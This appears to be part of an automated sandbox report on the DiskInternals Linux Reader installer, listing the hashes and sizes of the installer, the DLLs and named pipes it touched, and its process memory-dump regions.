45.1MB
MD567fbf5ad96a4506e3037eed00c1bbcd1
SHA1e65292b3255c21b852a1ee4d376979b99ea093ef
SHA256679692665f8ea5ed58996e81ede0d7ea7ec5c4231bf6694a4bb6789455916354
SHA51277f44f66904286b491d713378eac46ed45e246f01a6fab76cb583d6bd5ce3d2b5434e1a7f6cef7f08689f6f6f5006dc5661ef8550e996574bbac055c4b95aa58
-
C:\Users\Admin\Downloads\Linux_Reader.exeFilesize
45.1MB
MD567fbf5ad96a4506e3037eed00c1bbcd1
SHA1e65292b3255c21b852a1ee4d376979b99ea093ef
SHA256679692665f8ea5ed58996e81ede0d7ea7ec5c4231bf6694a4bb6789455916354
SHA51277f44f66904286b491d713378eac46ed45e246f01a6fab76cb583d6bd5ce3d2b5434e1a7f6cef7f08689f6f6f5006dc5661ef8550e996574bbac055c4b95aa58
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\crashpad_5040_UYGEYQODJGSDEEHJMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files (x86)\DiskInternals\LinuxReader\cbfs64.dllFilesize
381KB
MD50a677292d9239637a9570eaf4cfc0947
SHA1a4e2cc00c43d50c9fbea66a3a0f4b0c3c4ba8ef5
SHA2567ca5d98db5190004ee559b45529a963355d3989c947374545890068d47f16df1
SHA512c43cfb7dbbee8bb36ecaa0420fa6142812ab557112abe3b9f981cc524ab8e3cd4e5a8b5e7e81d39f9a8dca43898c63aedde70c823895cc2202d899ed12b2a9c2
-
\Program Files (x86)\DiskInternals\LinuxReader\fat12.dllFilesize
216KB
MD512656311536409eac6f061894cd54ee0
SHA1f30298777ae5326cd299d9e44a6f394f37cf5e8d
SHA2562301186b820fe70bcfcdc2677181681eadb44c8e2fc8ca5fbf06a74789dafbdd
SHA51226d547f71bc9b71d7299cef9a73d0dd69a40388c866ae34a38204b0b404f0f2f642ed4a34070e1264ce2bd2be2a7102161602f5e10e442c6e43daa5374dc96cf
-
\Program Files (x86)\DiskInternals\LinuxReader\fat16.dllFilesize
307KB
MD5dbaec21c502555e021f656955e647f67
SHA1d9ef317faa9fc3c17478de70e1d11676b73f1764
SHA256b5f37a5605f0b74d72997fdcf1076086e2325e6cc18dc366b84c253a80a33e92
SHA512438f2e949949e14bc3ff85b2beb375385bb95642c2c689c32789c0d3cd5e1125d665b25c38d78886ded518af66767c4269b8e1348552a413b196859c806cc846
-
\Program Files (x86)\DiskInternals\LinuxReader\ippcp.dllFilesize
779KB
MD52a9e5d0b6a5beb2fd06042fd5a04ea13
SHA15501e91a12bb0440983f8fc4e816b27d2e566824
SHA25664a6c8e4b17a41e3e63dc81b0cfc7d533674bf295db081a87cea5e97d5c66eca
SHA5122accd5325c6d6dccd03f824a015f6fd3063a65574adda4a940cfbd57344d171a4f8620490c8a872c6877095b81a75c5e19abfa3b3db54bb9c8e4feb523fc3e98
-
\Users\Admin\AppData\Local\Temp\nsf6FDC.tmp\System.dllFilesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
\Users\Admin\AppData\Local\Temp\nsf6FDC.tmp\nsDialogs.dllFilesize
9KB
MD5ab101f38562c8545a641e95172c354b4
SHA1ec47ac5449f6ee4b14f6dd7ddde841a3e723e567
SHA2563cdf3e24c87666ed5c582b8b028c01ee6ac16d5a9b8d8d684ae67605376786ea
SHA51272d4b6dc439f40b7d68b03353a748fc3ad7ed10b0401741c5030705d9b1adef856406075e9ce4f1a08e4345a16e1c759f636c38ad92a57ef369867a9533b7037
-
memory/1012-1176-0x00000249A93D0000-0x00000249A93D1000-memory.dmpFilesize
4KB
-
memory/1012-1173-0x00000249AD980000-0x00000249AD982000-memory.dmpFilesize
8KB
-
memory/1012-1185-0x00000249A8000000-0x00000249A8A4C000-memory.dmpFilesize
10.3MB
-
memory/1012-1157-0x00000249A93D0000-0x00000249A93D1000-memory.dmpFilesize
4KB
-
memory/1012-1180-0x00000249A9390000-0x00000249A9391000-memory.dmpFilesize
4KB
-
memory/1012-1184-0x00000249A8000000-0x00000249A8A4C000-memory.dmpFilesize
10.3MB
-
memory/1012-1163-0x00000249ADAE0000-0x00000249ADAE2000-memory.dmpFilesize
8KB
-
memory/1012-1159-0x00000249AD960000-0x00000249AD962000-memory.dmpFilesize
8KB
-
memory/1012-1108-0x00000249A7620000-0x00000249A7630000-memory.dmpFilesize
64KB
-
memory/1012-1133-0x00000249A7C00000-0x00000249A7C10000-memory.dmpFilesize
64KB
-
memory/1012-1161-0x00000249ADAB0000-0x00000249ADAB2000-memory.dmpFilesize
8KB
-
memory/2752-1093-0x00000000001A0000-0x00000000001A1000-memory.dmpFilesize
4KB
-
memory/2752-1122-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/3700-1165-0x0000000003270000-0x0000000003271000-memory.dmpFilesize
4KB
-
memory/3700-984-0x0000000003270000-0x0000000003271000-memory.dmpFilesize
4KB
-
memory/3700-1216-0x0000000003CF0000-0x0000000003CF1000-memory.dmpFilesize
4KB
-
memory/3700-1203-0x0000000003B60000-0x0000000003B61000-memory.dmpFilesize
4KB
-
memory/3700-980-0x00007FFCAECC0000-0x00007FFCAECC2000-memory.dmpFilesize
8KB
-
memory/4276-145-0x000002D6FAAE0000-0x000002D6FAAF0000-memory.dmpFilesize
64KB
-
memory/4276-148-0x000002D6FAAE0000-0x000002D6FAAF0000-memory.dmpFilesize
64KB
-
memory/4276-129-0x000002D6FB500000-0x000002D6FB576000-memory.dmpFilesize
472KB
-
memory/4276-126-0x000002D6FAAB0000-0x000002D6FAAD2000-memory.dmpFilesize
136KB
-
memory/4276-217-0x000002D6FC2E0000-0x000002D6FCA86000-memory.dmpFilesize
7.6MB
-
memory/4276-150-0x000002D6FAAE0000-0x000002D6FAAF0000-memory.dmpFilesize
64KB
-
memory/4276-144-0x000002D6FAAE0000-0x000002D6FAAF0000-memory.dmpFilesize
64KB
-
memory/4276-149-0x000002D6FAAE0000-0x000002D6FAAF0000-memory.dmpFilesize
64KB
-
memory/4276-147-0x000002D6FAAE0000-0x000002D6FAAF0000-memory.dmpFilesize
64KB
-
memory/4340-1166-0x0000000002FD0000-0x0000000002FD1000-memory.dmpFilesize
4KB
-
memory/4340-1150-0x0000000002FA0000-0x0000000002FA1000-memory.dmpFilesize
4KB
-
memory/4340-1151-0x0000000000400000-0x0000000001F0F000-memory.dmpFilesize
27.1MB
-
memory/4340-1192-0x0000000002FD0000-0x0000000002FD1000-memory.dmpFilesize
4KB
-
memory/4740-1193-0x0000000002FA0000-0x0000000002FA1000-memory.dmpFilesize
4KB
-
memory/4740-1191-0x0000000002FA0000-0x0000000002FA1000-memory.dmpFilesize
4KB
-
memory/4740-1187-0x0000000000400000-0x0000000001F0F000-memory.dmpFilesize
27.1MB
-
memory/4740-1186-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4860-306-0x000002CA2D800000-0x000002CA2D810000-memory.dmpFilesize
64KB
-
memory/4860-283-0x000002CA2D800000-0x000002CA2D810000-memory.dmpFilesize
64KB
-
memory/4860-281-0x000002CA2D800000-0x000002CA2D810000-memory.dmpFilesize
64KB
